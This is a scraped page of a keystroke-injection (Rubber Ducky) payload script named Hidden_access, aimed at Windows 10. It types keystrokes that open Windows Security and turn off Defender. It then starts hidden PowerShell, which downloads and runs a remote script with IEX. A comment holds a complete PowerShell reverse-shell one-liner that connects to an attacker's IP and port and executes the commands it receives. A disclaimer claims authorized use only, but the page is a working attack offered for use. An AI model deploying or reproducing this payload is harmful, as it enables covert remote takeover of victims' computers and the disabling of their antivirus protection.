Path: blob/master/payloads/library/remote_access/Hidden_access/payload.txt
2968 views
REM Author: makozort1REM Title: Hidden_access2REM Target: windows 103REM Description: gain a reverse shell to targets pc, the script works VERY qucikly agains machines with disabled defender4REM THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE, I TAKE NO RESPONSIBILITIES FOR ANY MISUSE5REM This is the rs.ps1 to host6REM $client = New-Object System.Net.Sockets.TCPClient("{IP here}",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()7DELAY 10008CTRL ESC9DELAY 30010REM this block disables windows defender, delete it if you dont need to. target may have varibles that mean you need to change how many times "TAB" is hit11STRING windows security12DELAY 30013ENTER14DELAY 100015ENTER16TAB17TAB18TAB19TAB20DELAY 30021ENTER22DELAY 60023SPACE24DELAY 60025LEFT26ENTER27DELAY 30028ALT F429GUI r30DELAY 60031REM open up powershell in hidden mode, run the command (the rs.ps1 that needs to be edited )you have already uploaded somewhere so that the ducky does not have to type it all out32STRING powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('LINK HERE');33ENTER34DELAY 60035LEFT36ENTER373839